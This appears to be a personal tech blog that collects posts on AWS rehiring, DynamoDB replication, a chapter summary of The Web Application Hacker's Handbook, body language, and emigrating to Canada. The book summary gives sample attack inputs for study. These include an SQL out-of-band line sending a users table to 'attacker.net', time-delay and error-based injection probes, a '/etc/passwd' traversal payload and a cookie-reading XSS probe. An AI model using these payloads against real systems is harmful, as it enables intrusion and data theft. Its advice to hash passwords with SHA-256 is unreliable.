On doing a boomerang to AWS

A boomerang employee is someone who leaves a company and later returns to it. Most of the time it’s made to get a bump in salary without having to go through a promotion process.

I worked for Amazon as a software engineer for four years. I left in 2021.

Last week I got an email from a recruiter in AWS. The conversation can be summarized like this:

• Recruiter: we miss you and surely you miss us! Do you want to boomerang back to AWS?
• Me: Maybe, but I want no live coding interviews.
• Recruiter: sorry, no.

I was… puzzled, to say the least.

Why title the email “do you want to boomerang?” if you are going to make me do interviews as if I were a brand new hire?

And why would you want to interview me as a brand new hire? Why do you need me to go through another coding interview? I publicly admit it, I hate those, for many reasons. But I worked for your company, you know I can code. And I left because I chose to, not because you decided suddenly that my code was not good.

Is it not in your best interest to make the process easier for me? Do you really prefer to hire someone completely new? Do you know how much time it takes a new hire to learn all of the amazon tools built in-house? I’ll tell you: it’s 6 months to a year at least.

The tech interview process is very broken…

DynamoDB replication

AWS DynamoDB does not follow the same architecture as the Dynamo paper.

If you use standard DynamoDB within a single-region, you get single-leader replication. This means that:

• One leader node handles all the writes.
• The writes are copied to follower nodes asynchronously.
• If you send two concurrent writes for the same PK+SK, you need to:
  • either use optimistic locking strategy to prevent the conflict from happening. (In summary, you need to add a version attribute to each item, and send Conditional Writes)
  • or use a pessimistic locking strategy to prevent the conflict from happening. (In summary, you send a Transaction that will abort if someone else is modifying one of those items)

If you use DynamoDB with global tables enabled, it becomes a multi-active database. This means that:

• You get one leader node per region.
• The writes sent to the leader node in one region will be automatically replicated to the nodes in the other regions asynchronously using DynamoDB streams.
• If you send two concurrent writes for the same PK+SK to two different regions, DynamoDB will use the last write wins strategy to solve the write conflict, so it’s possible to lose some writes. Neither optimistic locking nor pessimistic locking will protect you. A transaction sent to one region will not mean a transaction in the other regions: since the changes are replicated using DynamoDB stream, the “transaction” aspect is lost.

The Web Application Hacker’s Handbook

(The book and the answers to the questions at the end of each chapter.)

Phew, this book took forever to finish. This is my attempt to summarise a 900+ page book 🙂

Introduction

• Vulnerabilities in web apps arise because of one core problem: users can submit arbitrary input. Apps make themselves vulnerable by transmitting data via the client assuming that it will not be modified and by relying on client-side checks.
• Canonicalization is the process of converting or decoding data into a common character set.

Chapter 2: Core defense mechanisms

• Defense #1: Authentication
• Defense #2: Session management. Create a session for each user and issue a token identifying the session. The session data itself is stored on the server. When the user receives the token, the browser automatically submits it back to the server on each HTTP request.
• Defense #3: Access control

Chapter 3: Web application technologies

• HTTP uses TCP connections but each request and response may use a different TCP connection.
• HTTPS is the same as HTTP but it uses TLS.
• Some HTTP headers:
  • Host: mandatory in HTTP 1.1, indicates the server to which the client is making the request
  • Server: indicates the software on the server (may or may not be accurate)
  • Pragma (HTTP 1.0) and Cache-Control (HTTP 1.1) tell the client not to store the response in the cache
  • Connection: tells the other end of the communication whether it should close the TCP connection or if it should keep it open
  • Content-Type: the client telling the server what type it’s sending
  • Accepts: the client telling the server what type it wants back
  • Data-Type: the server telling the client what type it’s sending
  • If-Modified-Since: the client telling the server when it last received the resource
  • If-None-Match: the client giving the server an entity tag. The server uses this to determine whether the client can use its cached copy of the resource.
  • Origin: in AJAX calls, the client telling the server the domain from where the request is coming from
  • Access-Control-Allow-Origin: the server telling the client whether the resource can be retrieved via AJAX calls.
  • X-Forwarded-For: contains the original IP address of the client, in case there is a proxy sitting in the middle of the client and the server.
• HTTP methods:
  • HEAD: similar to GET but the server should not return a response body, just the headers.
  • OPTIONS: the server reports the HTTP methods that are available for a resource. It should respond with an “Allow” header
• Cookies attributes
  • expires: sets a date until which the cookie is valid
  • domain: to which the cookie is valid. It must be the same or a parent of the domain from which the cookie is received
  • path: the URL for which the cookie is valid
  • secure: the cookie will only be transmitted in HTTPS requests only
  • HttpOnly: the cookie cannot be accessed via client-side JavaScript
• Cookies are sent to the main domain and any sub-domains.
• In the client, JavaScript can access current URL and cookies
• The same-origin policy is designed to keep content that came from different domains from interfering with each other. Content received from one website can read and modify other content received from the same site, but is not allowed to access content received from other sites.

Chapter 4: Mapping the application

• Use Burp intruder to map an application
• Use Nikto2 to scan an application
• Use Fiddler to intercept traffic

Chapter 5: Bypassing client-side controls

• Cookies and hidden HTML form fields are not shown but they are accessible and modifiable by clients. Don’t store critical data in them.
• Query strings should NOT be used to transmit sensitive information because URLs with query strings are stored in many places (e.g. the browser’s history and server logs). Plus these URLs (and tokens) can appear in Referer headers.
• Replay attacks: to re-use some critical information (e.g. an encrypted item price) and re-send it in a separate request (e.g. to purchase an expensive product with a lower price)
• The only secure way to validate client-generated data is on the server.

Chapter 6: Attacking authentication

• Always hash password with a user-specific random salt so that if two users have the same password, they won’t have the same hashed password. The salt can be stored in plaintext.
• Always use strong hash functions like SHA-256.
• When trying to attack authentication, look everywhere: main login forms, register new accounts, change passwords, remember passwords, recover forgotten passwords, and impersonate other users.
• Session fixation: an attacker feeds a known session to a user, waits for them to log in, and then hijacks their session. If an app doesn’t issue a fresh token following a successful login, it is vulnerable to session fixation. Never send tokens in URLs.
• If a client has cookies disabled, store tokens in hidden HTML fields.
• Always send tokens through HTTPS.
• Cross-site request forgery attacks: an attacker makes a crafted request to an application from a website he controls, and he exploits the fact that the victim’s browser automatically sends her current cookie with this request. For this reason, never have GET requests change server data.

Chapter 7: Attacking session management

• You can bypass logins and masquerade as other users without knowing their credentials
• If an app encrypts data that plays a key role in its functionality, try the bit-flipping technique to see whether it’s possible to manipulate the encrypted information to interfere with the app’s logic.

Chapter 8: Attacking access controls

• Types of attacks:
  • Vertical privilege escalation: a user can do things that his role doesn’t allow him to
  • Horizontal privilege escalation: a user can view or modify resources that they shouldn’t be allowed to, like e-mails from other users.
  • Business logic exploitation: for example, bypassing the payment step in a checkout sequence.
• If the app is using RBAC, roles defined may be incomplete.

Chapter 9: Attacking data stores

• In native compiled languages, the injected payload contains machine code rather than instructions in that language.
• Because of how interpreted languages are executed (SQL, PHP), code injection can happen.
• Most databases implicitly cast an integer to a string
• In SQL, ORDER BY 1 orders by the first column
• If you are going to probe for SQL injections, ask the owner of the database to do a full backup because some attacks can destroy data.
• If a SQL query expects a 2, try sending 1+1 or 67-ASCII(‘A’)
• If a SQL query expects an A, try sending ASCII(‘A’)
• To find out what database you are attacking, try concatenating strings
  • Oracle: ‘serv’ || ‘ices’
  • MSSQL: ‘serv’ + ‘ices’
  • MySQL: ‘serv’ ‘ices’
• If you don’t know the value of a particular field, you can do SELECT NULL for that field because NULL can be converted to any data type
• In MSSQL, the metadata table information_schema.colums has details of all tables and columns
• One way of getting data from a database is to create an “out of band” channel: create a network back to your own computer. For example: SELECT * INTO OUTFILE '\\\\attacker.net\\share\\utput.txt' from users;
• When a database evaluates a SELECT X FROM Y WHERE C query, if condition C is never true, expression X is never evaluated. This can be used as follows: use the presence or absence of an error to test an arbitrary condition. For example: SELECT 1/0 FROM users WHERE (SELECT username FROM users WHERE username = 'admin') = 'admin'. If the user exists, the expression 1/0 is evaluated and it will throw an error.
• Time delays: if select(user) = 'admin' waitfor delay '0:0:5' will cause a time detail of 5 seconds if the current database user is ‘admin’.
• Use https://sqlmap.org/ to attack databases.
• Defenses:
  • Use parameterized queries in every database query.
  • If an application only needs reads access, don’t use an account that has write access.

Chapter 10: attacking back-end components

• Injecting OS commands can be done by supplying input that has shell metacharacters, for example pipe to redirect process outputs, ampersand to batch multiple commands
• In PHP and Javascript, the eval function can be used to execute any code
• Trying a time delay attack is the most reliable way to detect if command injection is possible. For example: ping -i 30 127.0.0.1
• Path traversal vulnerabilities arise when the application uses user input to access files and directories. For example, submitting images/../../etc/paswd
• If an application checks file extension, try adding a null byte at the end of the file you want, followed by the extension that the application wants. Example: ../../etc/passwd%00.jpg
• Defenses:
  • Reject any requests that have backslashes or forward slashes, or null bytes
• Remote file inclusion is possible in PHP with the include function and XML with external entities
• Server-side HTTP redirection can be exploited to use a vulnerable application as a proxy to attack other sites – the traffic will appear to come from the vulnerable application

Chapter 11: attacking application logic

• n/a

Chapter 12: attacking users with cross-site scripting

• XSS is the number one threat on the internet
• 3 varieties:
  • reflected: an attacker crafts a request containing embedded Javascript that is reflected to any user who makes the request
  • stored: data submitted by an attacker is stored in the application and then displayed to other users without being sanitised
  • DOM-based: an attacker crafts a URL containing Javascript code, which is then written to the page and executed in the same way as if the server had returned it
• Cookies can only be accessed by the domain that issued them
• Spear phishing: compromise the session of a specific user
• To identify XSS vulnerabilities: use "><script>alert(document.cookie)</script>
• Defenses:
  • validate ipnut
  • validate output
  • eliminate dangerous insertion points. Never insert user input into script code, or put user input in tag attributes that can take URLs

Chapter 13: attacking users with other techniques

• Same-origin policy: website X can issue requests to website Y, but it cannot process the response. So… it can do GET requests! In order to do anything else, website X must do a preflight request and website Y must respond with Access-Control-Allow-Origin headers.
• Browsers automatically submit cookies on every request
• Request forgery: attackers exploit the normal behavior of web browsers to hijack a user’s token, causing it to make requests that they didn’t intend. These attacks normally require the user to be logged in
  • Defense: supplement HTTP cookies with additional server-genereated tokens, like a hidden field in an HTML form
• UI redress attack (“clickjacking”): an attacker’s web page loads a target application within an iframe.
  • Defense: use the X-Frame-Options response header with value deny or sameorigin
• Javascript hijacking
  • Add for(;;) in every script returned by the server that is going to be processed as part of an AJAX response
• HTTP header injection when an attacker can inject headers and newlines, so… additional headers.
• HTTP response splitting attack to poison a proxy server cache
• Session fixation: when an attacker is able to take over a victim’s session
  • Defense: when a user logs in, give them a fresh session token, don’t reuse the first one that they were given while they were still anonymous
• Other defenses:
  • Use caching directives to prevent browsers from storing sensitive data
  • Never use URLs to transmit sensitive data
  • Use autocomplete=off on fields that store sensitive data

Chapter 14: Automating Customized Attacks

• Three main situations in which automatied techniques can help attack an application:
  • Enumerating identifiers
  • Harvesting data
  • Fuzzing: generating huge numbers of requests containing common attack strings
• Burp can trap requests
• Burp Intruder can fuzz requests. The most used attack is the sniper attack, which can fuzz one payload position at a time
• Burp Repeater can be used to analyze interesting results

Chapter 15: Exploiting information disclosure

• Always monitor application responses to identify any error messages that may contain useful information. Database errors should always be masked.

Chapter 16: Attacking native compiled applications

• Native execution environment (C, C++) have manual management of the heap, therefore are prone to buffer overflows, integer vulnerabilities and format string bugs
• Managed execution environments (Java, C#) don’t have those issues
• Stack overflows occur when, for example, you try to strcpy() into a buffer that is too short. If the buffer is overflowed, the attacker can potentially overwrite the address of the next function to be executed.
• Heap overflows are less staightforward to exploit. The attacker can potentially overwrite the control structure of an adjacent heap block in memory. This may result in an execution crash at a later point
• Off-by-one errors occur when an attacker can write a single byte beyond the end of an allocated buffer, which enables them to take control of the flow of execution and the application may return more data than it should. (In languages like C, the end of a string is indicated by a null byte; if its missing this, it continues as far as the next byte)
• To detect buffer overflow vulnerabilities, send long strings of data and monitor for error results
• Integer overflows occur when, for example, a variable of type short (16 bits) tries to hold the number 2^16. The program adds 1 and the value wraps to become 0.
• Signedness errors occur when signed and unsigned variables are compared. Negative values are treated as large positive numbers.
• Format strings vulnerabilities occur when user input is used as the format string parameter of a function like printf in C. The most dangerous specifier is %n, which causes the number of bytes output so far to be written to the address of the pointer. If the user passed less variables than parameters in the format string, the code will not detect it and continue processing parameters from the call stack.

Chapter 17: Attacking application architecture

• Defects in an application’s architecture can enable attackers to escalate an attack, moving from one component to another. For example, if the application is vulnerable to OS command injection, and the application and the database live in the same machine, it may be possible to access data in the database.

Chapter 18: Attacking the application server

• Defects in an application server can enable attackers to access directory listings, source code for executable pages, sensitive configuration data, and the ability to bypass input filters.

Chapter 19: Finding vulnerabilities in source code

• White-box testing involves looking inside the source code
• Many vulnerabilities can be discovered more quickly through black-box testing

Chapter 20: toolkit

• Tools needed for almost all hackers:
  • Proxy interceptors like Burp Suite that can capture requests and responses and modify them
  • Standalone scanners, like Stackhawk, which probe for common vulnerabilities

Chapter 21: methodology

AWS Networking Concepts

Before March 2023 I couldn’t for the life of me understand what was going on in the AWS VPC dashboard. I mean, look at the length of the scrolling bar on the left-hand panel!

So, with the goal of figuring out the various resources involved in networking, I read (most of) this book: AWS Networking Fundamentals, by Toni Pasanen.

My first thought after finishing it was this: there’s so many resources involved because there’s a lot of types of connections you can have. AWS account to on-premise, account to account, VPC to VPC, subnet to subnet, VPC to internet, VPC to specific AWS services…

So anyway, I made this mind map to link all pieces together (Lucidchart link):

Let me know if you find it useful and/or if you find any errors!

What every body is saying

Non-verbal communication is a big chunk of how we communicate. The following is a summary of the book What Every Body is Saying that I read a few years ago.

Body Part	Action	Explanation	Causes
Arms	Leap and thrust arms in the air	They feel good or confident	Gravity-defying actions are a common response to joy and excitement
Arms	Arms sink	They feel down
Arms	Arms freeze around certain people; especially seen on abused kids	They try not to draw attention to others	Limbic system’s freeze response
Arms	Arms behind their backs	Higher status display and isolating signal	Territorial display, when we are confident we spread out
Arms	Arms form a V shape displaying all the fingers	They are confident and unwilling to be bullied	Territorial display, when we are confident we spread out
Arms	Arms form a V shape displaying only one finger	They are inquisitive and concerned	Territorial display
Arms	Interlaced hands behind the head	They are comfortable and dominant	Territorial display, when we are confident we spread out
Body	Freeze	They feel threatened or exposed	Freeze, fight or flight
Body	Turtle effect: shoulders rise toward the ears	They suddenly lose confidence or are uncomfortable	When we are insecure, we tend to take up less space
Body	Leaning away from somebdoy	They disagree or feel uncomfortable around each other	Self defense mechanism: protecting internal organs (heart, liver, stomach, etc.)
Body	Self hug	Pacifying behaviour, response to stress	Similar to the way a mother hugs a young child
Body	Feet and legs splay out	They are becoming increasingly unhappy	Claim greater territory, indifference to authority, disrespectful
Body	Overall lack of personal hygiene and grooming	They are sad or ill	The brain has other priorities other than personal appearance
Chest	Puffing out the chest	Trying to establish territorial dominance
Eyes	Eye blocking (using one or both hands, or an object), squinted eyes	Display of consternation, disbelief or disagreement
Eyes	Eyes wander all over the room	They are disinterested or feel superior
Eyes	Pupil contraction	They have seen something they don’t like	Pupils contract so that we can see clearly and accurately in order to defend ourselves
Eyes	Pupil dilation	They have seen something they like	Pupils dilate to let in the maximum amount of light and sending more information to the brain
Eyes	Raise or arch eyebrows	They have seen something they like	Gravity-defying actions are a common response to joy and excitement
Face	Rubbing of forehead	Pacifying behaviour, response to stress
Face	Exhale with puffed out cheeks	Pacifying behaviour, response to stress
Face	Excessive yawning	Pacifying behaviour, response to stress
Feet	Happy feet: feet wiggling or bouncing	High confidence signal
Feet	Feet point at you	The welcome is genuine, they want to talk to you
Feet	Feet point away from you	They don’t want to be around you anymore
Feet	Feet make an L shape, one pointed at you, the other 90°	They want to talk to you but they have to be somewhere else
Feet	Toes point upward	The person is in a good mood or thinking or hearing something positive	Gravity-defying actions are a common response to joy and excitement
Feet	Feet shift from flat footed to the “starter’s position”	The person is ready to do something physical
Feet	Feet touching	There is a positive connection between two people
Feet	Feet shift from jiggling to kicking	They have seen something negative	Kicking is a subconscious way of fighting the unpleasant
Feet	Feet shift from wiggles to freeze	They are under stress or feel threatened	Tendency of an individual to stop activity when faced with danger
Feet	Turn toes inward or interlocks feet	They feel insecure, anxious or threatened	People tend to restrict arm and leg movements when lying
Fingers	Fingers planted spread apart on a surface	They are comfortable and dominant	Territorial display, when we are confident we spread out
Hair	Play with hair	Pacifying behaviour, response to stress
Hands	Hands hidden behind something, under something, or in pockets, when talking to someone	DON’T DO IT: People get the impression they are unfriendly and hiding something
Hands	Finger pointing	DON’T DO IT: People think it is very rude and offensive
Hands	Self-grooming when others are talking to you	DON’T DO IT: People think it is a sign of dismisiveness
Hands	Nail-biting	DON’T DO IT: Sign of insecurity or nervousness	Pacifying behaviour
Hands	Shaky hands	They are very excited or very nervous
Hands	Touching the spread fingertips of both hands, as if praying	They are very confident
Hands	Hand-wringing	They are stressed or concerned
Hands	Thumb up; thumbs sticking out of the pocket	They are very confident
Hands	Thumbs hidden, thumbs in pocket but lets fingers hang out on the side	They are not confident
Hands	Using the hands to frame the genitals	They are very confident	Dominance display with emphasis on the sexual
Hands	Stroke fingers across palm or rubbing hands together	Pacifying behaviour, response to stress
Hands	Fingers interlace to rub up and down	Pacifying behaviour, response to stress
Head	Head tilt	They are comfortable, receptive and friendly	We expose our most vulnerable area, the neck
Knees	Clasping of the knees	The person wants to get up and leave
Legs	Leg cleansing: hands on top of legs and slide them toward the knee	Pacifying behaviour, response to stress	Dries sweaty palms and pacifies through tactile stroking
Legs	Legs crossed while standing	They feel comfortable or confident; they tilt toward the person they like the most	Balance is reduced significantly because they are standing on one foot
Mouth	Lip compression, press lips to make them disappear	There is stress or anxiety	We are not allowing anything else into our bodies
Neck	Neck touching and/or stroking, playing with a necklace, adjusting tie	Pacifying behaviour, response to stress
Neck	Ventilator: pulling the fabric of the neck away from the skin	Pacifying behaviour, response to stress
Shoulders	Partial shrugs	Lack of commitment or insecurity
Shoulders	Both shoulders shrug sharply and equally	Lack ok knowledge, but they confidently support what they are saying	Gravity-defying actions are a common response to joy and excitement
Sounds	Whistling	Pacifying behaviour, response to stress
Stomach	Upset stomach	Response to a stressful situation	During emergencies there is no time for digestion, the body prepares for escape or physical conflict
Torso	Body turns away from somebody or something	They can’t handle what they are seeing	The ventral side is the most vulnerable side of the body, so the limbic brain has an inherent need to protect it from things that can harm us
Torso	Crossing of the arms or use of an object to cover the torso (pillows)	Discomfort of the situation	The ventral side is the most vulnerable side of the body, so the limbic brain has an inherent need to protect it from things that can harm us
Torso	Torso bow	Regard and respect for others	Let the higher-status person know that his position is clear
Torso	Stooping as walking or standing	They are mentally depressed	The weight of the world bringing them down
Eyes	Incresed blink rate	They are aroused, troubled or nervous
Face	Tilted head and side glance or brief roll of the eyes	They are distrustful or unconvinced
Mouth	Real smile: the corners of the mouth point toward the eyes	They are truly happy
Mouth	Lips pursed as if prepared to kiss	They disagree with something or someone
Mouth	Sneer	They don’t respect you or your thoughts
Mouth	Excessive lip licking, mouth touching	They are stressed or concerned	Pacifying behaviour
Mouth	Tongue jutting (placing tongue between teeth, without touching the lips)	They were caught doing something they shouldn’t, or they gott away with something
Nose	Nasal wing dilation	They are aroused	Provides oxygenation
Face	Crinkle nose	They are disgusted
Face	Chin pointed upward	They are comfortable and confident
Face	Chin pointed downward	They are insecure
Body	Sitting on a chair and holding onto it like an ejector seat	They are stressed or uncomfortable
Hands	Palms-up position (showing the palms)	They want to be believed or accepted
Hands	Palm down position	They are confident about what they are saying

People’s thoughts on password managers

A co-worker shared this article from The Guardian with me: Not using a password manager? Here’s why you should be…

And suggested that we read the comments. So I did.

The man’s got a point. I think the industry is heading in that direction. Both my phone and my laptop have fingerprint readers and I use them daily.

I genuinely don’t know whether this is possible.

This person assumes that finding someone’s email is hard. They must not have many friends…

This manager only has one or two passwords to remember, apparently. I have 246.

Okay so it has happened to me MANY TIMES that I forgot the key to my apartment in my apartment’s door. Can you imagine what trouble I’d be in if I forgot my magic notebook somewhere?

Password managers need to do a better job of explaining how their product works. Good luck explaining one-way hashing functions 🙂

“Trust in your own ability”… Ah yes, why should I keep my money in the bank? My desk drawer is perfectly safe!

Damn I forgot this was the 1900s when internet cafes were still a thing.

I chuckled.

I nearly choked on my coffee.

ELI5: AWS Partitions

A Partition is a group of AWS Region and Service objects. There are currently five partitions:

1. AWS: all standard commercial regions.
2. AWS-cn.
   • Codes ZHY and BJS.
   • Has its own different domain, www.amazonaws.cn, and the Amazon Resource Name (ARN) syntax includes a cn. arn: aws–cn
   • Its regions have no direct connectivity with AWS global.
   • You need a legal entity registered in China to open an account.
3. AWS-us-gov. (GovCloud)
   • Codes OSU and PDT.
   • To serve the needs of federal, state, and local government agencies.
   • Operated by US citizens on US soil.
   • Lacks some services
   • Uses endpoints that are specific to AWS GovCloud and are publicly available from the Internet but are accessible only to AWS GovCloud customers.
4. AWS-iso: secret government data.
   • Code: DCA
   • Launched in 2017.
   • Can operate workloads up to the Secret U.S. security classification level.
   • It can be used by any government agency.
5. AWS-iso-b: top secret government data.
   • Code: LCK
   • Launched in 2014.
   • It’s not part of the public internet, but is air-gapped from the internet, providing maximum security.
   • Was built by AWS but is hosted on-premise at the CIA.

Definitive guide to fixing sync issues between Android phones & Fitbit Charge 2

Setup:

• Android phone (in my case it’s a OnePlus 5T with Android 9)
• Fitbit Charge 2

Problem: when using the Fitbit’s connected GPS functionality, your runs or bike rides show incorrectly on the map (gaps in data, straight lines, etc.)

Solution:

1. Ensure your phone & Fitbit have the latest updates.
2. Let your Fitbit drain & die.
3. If you have the Fitbit app in your phone:
   1. Remove the connection to your Fitbit.
   2. Uninstall the Fitbit app.
4. In your phone’s Bluetooth settings, remove your Fitbit.
5. Restart your phone.
6. Charge your Fitbit to full capacity and leave it charging.
7. Install the Fitbit app and add the Fitbit.

 

11.282 km

La idea de hoy es contar cómo fue que emigré desde Argentina a Canadá. Muchos me preguntan y lo quería compartir.

La previa

La odisea surgió cuando un amigo (nota mental, comprarle un regalo) me contó que había recibido un mail de Amazon invitándolo a un evento de hiring en Buenos Aires. Me dijo que el no quería ir y me preguntó si a mi me interesaba. Los únicos requisitos que recuerdo que pedían era saber hablar inglés, tener título, y tener al menos 3 años de experiencia. No tardé mucho en decirle a mi amigo que me mande ese mail.

A los días de mandar mi CV, me llegó un link a un ejercicio online que tenía que resolver en 2 horas. Eran dos ejercicios en realidad, uno muy fácil y otro difícil que no logré resolver. Mandé mis respuestas, con la certeza de que no me iban a contestar.

Al día siguiente me llega un mail de RRHH de Amazon que me querían hacer una entrevista telefónica. La charla duró media hora, me hicieron algunas preguntas básicas de algoritmos y estructuras de datos.

A los pocos días me llega otro mail diciendo que había pasado a la etapa final: una ronda de entrevistas presenciales en el Palacio Duhau. Asimismo me mandaron otro documento con “tips” sobre cómo prepararme para las entrevistas. Esto no es ningún misterio: es sabido que Amazon tiene un método de entrevistar muy particular.

Las entrevistas

El evento fue fijado para Enero 2017. Tuve un mes para prepararme; durante este tiempo pensé duro en dos o más ejemplos para todos los Leadership Principles, y practiqué online en FireCode.io con ejercicios de todo tipo, y leí bastante de Cracking the Coding Interview.

A pesar de que no estaba trabajando, el mes se me pasó rapidísimo y llegó el día de las entrevistas. Creo que puedo decir con certeza que nunca había estado tan nerviosa en mi vida. Ya había hecho entrevistas telefónicas en inglés, pero nunca presenciales. Cuando llego al lugar de las entrevistas, había unas 10 personas esperando además de mi.

Fueron 4 o 5 entrevistas (no me acuerdo), una atrás de la otra, de 50 minutos cada una. La estructura era siempre la misma: 15 minutos hablando sobre mí y dando ejemplos de Leadership Principles, 30 minutos haciendo un ejercicio, y 5 minutos donde yo podía hacer preguntas. Honestamente no me acuerdo de qué trató cada ejercicio, solo me acuerdo dos: uno en el que había que diseñar un sistema, y otro de programación en una pizarra. Los demás no me acuerdo, pasó todo muy rápido… irónicamente, sí recuerdo que al terminar todo, me subí al auto para volver a mi casa y me quedé dormida en la parte de atrás.

Amazon tiene la promesa de que el 95% de los candidatos reciben una respuesta a los 5 días hábiles de hechas las entrevistas. Bueno… en mi caso fueron varias semanas. El 22 de Febrero de 2017 a las 1:27 a.m., me llega un mail avisándome que me extendían una oferta para trabajar full-time en las oficinas de Vancouver, BC. Envié mi aceptación de la oferta a la semana. Demás está decir que mi emoción era mucha 🙂

La previa de la aventura

En los mails siguientes a la oferta, me indicaron que Amazon se encargaba de todo, pero yo tenía que darles todos los papeles.

Uno de los mayores dolores de cabeza fue conseguir el título de la universidad (gracias UBA!). Mi título estaba en trámite, y yo necesitaba sí o sí el oficial, así que tuve que mover cielo y tierra para que me dejaran hacer una jura privada antes de irme.

También tuve que mandar pruebas de que sabía hablar inglés. Por suerte yo ya había rendido exámenes (IGCSE) así que usé esos, pero en general, si no tenés pruebas, te hacen rendir el IELTS General. (Este lo tuve que rendir estando ya en Canadá, para aplicar a la residencia permanente). También tuve que esperar a que me realizaran un background check: llamaron a mis empleadores anteriores para verificar que no había mentido en mi CV.

Una vez que junté todo eso, más las cartas de recomendación mis antiguos empleadores, más un examen médico, Amazon (bueno Amazon no, una empresa especializada en trámites migratorios) se encargó de preparar un documento llamado LMIA (Labour Market Impact Assessment) que, en resumidas palabras, me describe a mí, y está hecho para demostrar que al contratarme a mí no le están quitando trabajo a canadienses.

Por otra parte, estaba el tema de la mudanza. Por suerte, yo no tenía nada para mudar ni vender, solo estaban yo y mi ropa. (Mi mascota quedaba en Buenos Aires). Amazon me había ofrecido dos opciones: o ellos se encargaban de todo (por ejemplo, alquilando un container y reservando hoteles) y yo no veía un peso, o ellos no hacían nada pero me daban una suma de dinero para que yo me arreglara. Naturalmente, elegí la segunda opción, y con eso pagué los pasajes y un mes de estadía en un Airbnb para alojarme mientras buscaba un departamento permanente.

La aventura comienza…

El 17 de Junio de 2017 desembarqué en Vancouver. En el aeropuerto tuve que presentar el LMIA. En ese mismo momento me dieron el famoso work permit, que me habilitaba a trabajar para Jeff (y solo para Jeff) durante 2 años. El work permit me lo quitaron en el 2019 cuando tramité la residencia permanente (que, entre nos, solo sirve para dos cosas: para poder cambiar de empleador a piacere, y para luego tramitar la ciudadanía).

El resto es la historia de la vida en Vancouver, pero eso queda para otro post. Hasta la próxima!

PD: el título de este post es la distancia exacta que hay entre mi casa en Buenos Aires y mi casa en Vancouver 🙂

49.304260
-123.143792

No Digas “Hola” por Chat!

Este artículo es una adaptación al español de nohello.com.

Por favor no digas simplemente “hola” por chat.

Por ejemplo:

– Pedro: Hola
– Tomas: Hola
Tomas espera mientras Pedro escribe su pregunta…

– Pedro: Quiero hacer esto pero no se cómo…
– Tomas: Ah, lo que tienes que hacer es…

Tomas tuvo dos distracciones: una para saludar, y otra para contestar la pregunta. Es como si Pedro hubiera llamado a Tomas por teléfono, le hubiese dicho “hola” y luego le hubiese cortado. Y luego lo llama de nuevo con la pregunta.

En su lugar, haz esto:

– Pedro: Hola Tomas, quiero hacer esto pero no se cómo…
– Tomas: Ah, lo que tienes que hacer es…

Observa como Pedro obtuvo su respuesta mucho mas rápido, y Tomas no tuvo dos distracciones.

En el primer ejemplo, Pedro trató de ser “educado” y saludó a la persona primero, como haría en una conversación cara a cara, o por teléfono. Pero el chat no es ni la vida real ni el teléfono. Escribir con el teclado lleva mucho más tiempo que hablar. Tu intento de ser educado resultó en una pérdida de productividad para la persona a la que le hiciste la pregunta.

Sucede lo mismo con los mensajes “Hola, estas ahí?”, “Hola, tienes un segundo?”. Haz la pregunta de una vez!

Y por último, suponiendo que Pedro y Tomas están en husos horarios diferentes:

– Pedro: Hola
(8 horas después)
– Tomas: Disculpa, estaba durmiendo, qué necesitas?

Si Pedro se olvida de escribir el resto del mensaje, Tomas se quedará pensando cuál había sido la pregunta.